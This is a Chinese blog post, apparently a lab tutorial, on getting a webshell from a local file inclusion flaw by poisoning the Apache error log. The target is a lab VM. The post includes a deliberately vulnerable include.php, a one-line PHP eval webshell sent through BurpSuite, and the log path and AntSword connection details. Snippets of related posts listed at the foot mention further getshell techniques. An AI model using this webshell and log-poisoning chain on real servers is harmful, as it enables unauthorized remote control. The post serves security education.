【文件包含漏洞04】当服务器仅存在本地文件包含漏洞时,如何GetShell?

已于 2022-07-01 04:14:23 修改
阅读量4.6k 收藏 5
点赞数 3
分类专栏: # 筑基07:WEB漏洞原理 文章标签: 服务器 php 安全 文件包含 include
于 2022-03-11 18:10:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fighting_hawk/article/details/123418287
版权

目录

1 实验介绍

  1. 实验要求:假设攻击者已经知道服务器存在且仅存在本地文件包含漏洞,没有文件上传漏洞点及其他漏洞,如何GetShell。
  2. 实验目的:利用本地文件包含漏洞GetShell。

2 实验环境

2.1 靶机

  1. 概况:win2008虚拟机系统,部署phpstudy平台,IP地址为192.168.1.4。
  2. 查看靶机PHP版本。需要查看所搭建的服务器的PHP版本,下一步修改其配置。
    在这里插入图片描述
  3. 打开phpstudy安装文件夹,找到PHP-5.4.45版本对应文件夹,将文件php.ini中的allow_url_include参数设置为On,修改后记得保存并重启服务器。
    在这里插入图片描述
  4. 在网站根目录下新建一个test文件夹,在文件夹内新建一个txt文件,输入以下内容,并重命名为include.php。
<?php
$path = $_GET['path'];
echo "<h1>This is include.php!</h1>";
include ($path);
?>

2.2 攻击机

真实机上安装BurpSuite和中国蚁剑,相关软件的安装参考《BurpSuite简介及安装》、《中国蚁剑V2.0下载安装到上手》。

3 实验步骤

  1. 思路:由于没有存在文件上传点,而我们又需要服务器本地有个文件存在一句话木马代码,这时候我们想到,利用日志文件记录报错的方法,来往日志文件中“写入”一句话木马,然后再利用文件包含来执行日志文件中的一句话木马。
  2. 将访问include.php页面的URL链接复制,在BurpSuite的repeater模块中右键将URL黏贴为请求,点击发送,可以看到成功接收到响应,只是因为没有传递给path变量,所以提示出错。
    在这里插入图片描述
  3. 修改请求为一句话代码<?php @eval($_REQUEST[111]);?>,点击发送,可以看到响应报错。
    在这里插入图片描述
  4. 服务器在请求报错后,在错误日志中就会增加一条响应记录。在靶机上我们打开Apache的错误日志,路径为C:\phpStudy\PHPTutorial\Apache\logs\error.log,可以看到新增了一个错误信息,并且该代码没有被引号所包括,能够被文件包含无条件执行。
    在这里插入图片描述
  5. 真实机中打开中国蚁剑,添加数据http://192.168.1.4/test/include.php?path=C:\phpStudy\PHPTutorial\Apache\logs\error.log,密码为111,点击添加。
    在这里插入图片描述
  6. 添加后双击新建的链接,可以看到成功管理服务器。
    在这里插入图片描述

4 总结

  1. 思路:第一步利用一切可能让服务器本地某个文件中含有一句话木马;第二步文件包含之让代码执行。
  2. 思考:如果错误日志不是在默认位置,应该如何找到或者是否有其他途经?
  3. 思考:如果靶机存在远程文件包含漏洞,攻击者在服务器2号上写一个一句话木马文件,利用靶机远程文件包含该文件,并不能Get靶机Shell。后续应更加深入理解一句话木马的控制原理,以判断为什么无法实现,初步认为shell代码是在服务器2号上执行的。
Fighting_hawk
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
php命令执行后门,phpstudy后门利用方法及getshell
weixin_33207144的博客
03-10 969
0x01 phpstudy利用方法请求任意后缀为php的文件目标环境为php5.2,5.4,且不能为nts在Accept-Encoding: gzip,deflate此处填写base64加密后的payload:accept-charset: c3lzdGVtKCdjYWxjLmV4ZScpOwGET/phpinfo.phpHTTP/1.1Host:192.168.1.1User-Agent...
phpMyAdmin 4.8.1后台文件包含漏洞Getshell的几种姿势
qq_45521281的博客
04-27 2321
phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613) phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中在一处文件包含逻辑, 通过二次编码即可绕过检查,造成远程文件包含漏洞。 受影响版本: phpMyAdmin 4.8.0和4.8.1受到影响。 登陆phpmyadmin后台: 访问 http://192.168.0.13...
后台getshell常用技巧
黑面狐
04-03 1万+
1.利用文件上传漏洞,找文件上传处想办法上传php文件。 一些网站在设置可以允许修改上传的文件类型则直接添加php 有候会还有检测是否为php文件,可以通过文件名变形,大小写,双写等形式绕过,只要是黑名单的都比较好绕过 很多cms还有.hatccess文件禁止访问或者执行这个目录下的文件的情况 这种情况直接上传一个.hatccess文件覆盖这个,让其失效。 或者上传不重命名的...
文件包含漏洞
qq_50854662的博客
05-21 6613
文件包含文件包含漏洞知识总结 一、什么是文件包含漏洞? 1、文件包含概述 和SQL注入等攻击方式一样,文件包含漏洞也是一种“注入型漏洞”,其本质就是输入一段用户能够控制的脚本或者代码,并让服务器端执行。 什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数,直接调用此文件,而无需再次编写函数,这一过程就叫做包含。 有候由于网站功能需求,会让前端用户选择要包含文件,而开发人员又没有对要包含文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任.
phpinfo包含文件Getshell全过程及源码
记录学习,一起进步
03-04 2373
phpinfo包含文件Getshell全过程及源码
PHP文件包含漏洞复现
春日野穹
09-17 2737
引言~ 老规矩,介绍一波原理先 PHP文件包含原理: 文件包含漏洞的产生原因是在通过 PHP 的函数引入文件,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。 php 中引发文件包含漏洞的通常是以下四个函数: 1、include() 当使用该函数包含文件,只有代码执行到 include() 函数才将文件包含进来,发生错误只给出一个...
getshell姿势(三)--文件包含
最新发布
qq_45936617的博客
10-06 215
文件包含是指一个文件可以包含(接入)另一个文件。常见的PHP文件包含函数为include()、require()、include_once()、require_once()。文件包含可以分为本地文件包含和远程文件包含。本地文件包含只能对服务器本地文件进行包含;远程文件包含可以通过URL地址包含其他服务器的内容。在PHP环境中,远程文件包含需要的条件为allow_url_include、allow_url_fopen为开启状态:on。
浅析php文件包含及其getshell的姿势
weixin_50464560的博客
05-29 1655
0x1 前言  不管平在打ctf或者代码审计的过程中,文件包含都是很薄弱、很常见的点,一般的开发人员可能觉得文件包含没有什么大问题,低估其造成的危害,我一个ctf爱好者也是这么认为的,直到最近打了几场ctf都出现了文件包含的点,然后被暴虐,才发现文件包含的利用面很广,所以就此打算写篇文章来记录下自己的学习过程。 0x2 认识和了解包含函数  PHP里面共有4个与文件包含相关的函数,分别是: include require include_once require_once 查看相关函数的文档了解他们
phpstudy后门getshell
10-14 3496
昨天在测试候监听着我自己服务器的80端口,突然有个请求过来了。。一看ip,和我在同一个公网网段。可能是有人在扫我吧。 在浏览器里直接访问他的ip,发现80端口上搭了一个php服务。直接访问是一个phpstudy的探针。 看到phpstudy,忽然想起前些天的phpstudy后门。在网上查了一下, 我看的是这篇文章: https://www.cnblogs.com/-qing-/...
文件包含漏洞结合ssh登录日志getshell
weixin_54813510的博客
06-26 488
文件包含漏洞)是程序开发人员通常出于灵活性的考虑,会将被包含文件设置成变量,然后动态调用这些文件。但正是因为调用的灵活性导致用户可能调用一些恶意文件,造成文件包含漏洞文件包含漏洞分为本地文件包含漏洞和远程文件包含漏洞。php中文件包含的函数有:require(),找不到被包含文件会产生致命错误,并停止脚本运行。include(),找不到被包含文件只会产生警告,脚本将继续运行。include_once()与include()类似,唯一区别是如果该文件中的代码已经被包含,则不会再次包含
seeyonAjaxGetshell:致远OA seeyon未授权漏洞批量getshell
05-28
致远OAseeyon未授权漏洞+文件上传批量getshell 抄借鉴tools论坛大佬的payload写了个批量拿shell的脚本。 Note: 为了方便(懒比)直接调用curl,因此请在Linux下运行。 ip.txt --> 待检测IP shell.txt --> shell...
暴力破解到getshell
06-10
暴力破解到getshell视频教程,本课程通过暴力破解获取后台管理权限,通过上传一句话木马,获取服务器权限。通过案例操作详细讲解该种类型漏洞利用过程中所需要得知识,并针对研发讲解了该漏洞得修复方案,从攻击和...
Zimbra 小于 8.8.11版本 XXE GetShell EXP.rar
05-08
Zimbra邮件系统远程代码执行漏洞GetShell 漏洞描述: 漏洞是利用XXE和ProxyServlet SSRF 漏洞拿到 admin authtoken 后,通过文件上传在服务端执行任意代码,威胁程度极高。当Zimbra服务端打来Memcached缓服务是...
Fail2Ban-Filters:Fail2Ban筛选器可通过阻止源IP地址来帮助保护Apache Web服务器免受诸如nmap,sqlmap,nikto,vega和其他漏洞扫描程序之类的扫描程序的侵害
05-02
Fail2Ban筛选器可通过阻止源IP地址来帮助保护Apache Web服务器免受诸如nmap,sqlmap,nikto,vega和其他漏洞扫描程序之类的扫描程序的侵害 什么是Fail2ban? 它是一种HIPS(主机入侵防护系统),可以分析日志文件并...
jboss xml漏洞exp
07-31
即:将shell.jsp文件上传到服务器上,最终部署的war访问: http://192.168.7.84:10081/myname/index.jsp 如果有mynameok 表示部署成功 使用client.htm客户端进行连接即可(需要修改ip等信息) 4.远程部署war java -...
文件包含漏洞-03】文件包含漏洞的利用及如何利用本地文件包含漏洞GetShell
cc
02-24 3597
如果网站在远程文件包含漏洞,攻击者在服务器2号上写一个一句话木马文件,利用网站远程文件包含文件,并不能Get网站Shell。由于没有文件上传点,而我们又需要服务器本地有个文件在一句话木马代码,这候我们想到,日志文件记录报错的方法,就是从日志文件中“写入”一句话木马,然后再利用文件包含来执行日志文件中的一句话木马。在该网站根目录下,新建文件FileInclusion,在此文件夹中新建文件include.php,文件内容为。我们可以利用文件包含漏洞读取任意文件,读取文件候有利用条件。
网站后台拿shell方法总结
一小平民
03-18 1万+
今日带给大伙的都是些手艺上的总结,有些人老问经验怎么来的,这个即是经验,盼愿大伙都能成为脚本妙手. 动网上传漏洞,信任大伙拿下不少肉鸡吧。可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然全国,现在这种漏洞已经根柢斗劲难见到了,不扫除一些小网站模拟仍是在此漏洞。在拿站历程中,我们凡是费了九牛两虎之力拿到办理员帐号和密码,并顺遂进入了后台,当然此与拿到网站webshell还有一步之遥
文件包含漏洞实战
yuan_boss的博客
08-31 1211
可以看到,我们成功获取到了hosts文件,但是这并不能证明是文件包含漏洞,因为这是把hosts文件读取出来了,最多能确定的是文件读取漏洞,所以我们可以写一个把phpinfo.php放到www的一个目录中,我们尝试访问phpinfo.php,看看能否解析成功,解析成功了就说明是文件包含漏洞。我们可以使用文件包含漏洞,这个候就需要考虑到php的一些封装协议了,利用封装协议,可以读取PHP文件源码,可以执行PHP命令。由上面的结果可知,我们利用php://input成功执行了php的命令。
WEBSHELL姿势之文件上传漏洞(渗透实验)
热门推荐
forbidd3n,keep going
10-14 1万+
实验场景  某互联网公司授权你对其网络安全进行模拟黑客攻击渗透。在XX年XX月XX 日至XX年XX月XX日,对某核心服务器进行入侵测试,据了解,该web服务器(10.1.1.178)上 C:\consle储有银行的关键敏感数据。 目标任务       请以下列任务为目标进行入侵渗透 :       1、利用网站漏洞获取该服务器shell;(网页关入侵--铜牌任务)
java防止文件上传_文件上传漏洞getshell的最好方式,我们如何防御?
06-10
文件上传漏洞是一种非常常见的Web安全漏洞,黑客可以利用此漏洞上传恶意文件(如Webshell),从而实现对服务器的攻击和控制。为了防止文件上传漏洞,可以采用以下措施: 1. 对上传文件进行类型、大小、后缀名等限制,只允许上传必要的文件类型和大小,并且要对文件后缀名进行过滤。 2. 对上传的文件进行病毒扫描,确保上传的文件没有病毒。 3. 对上传的文件进行隔离处理,将上传的文件放在一个独立的目录下,并且禁止执行上传文件的权限。 4. 对上传的文件进行重命名,避免上传文件名中包含敏感信息或特殊字符。 5. 对上传文件的权限进行严格控制,只有具有上传权限的用户才能上传文件。 6. 定期对上传目录进行扫描,及发现上传漏洞和上传的恶意文件。 以上措施可以有效地防止文件上传漏洞,但是需要注意的是,不同的Web应用程序可能在不同的漏洞,需要根据具体情况进行处理。同,也需要定期更新和维护Web应用程序,保证其安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值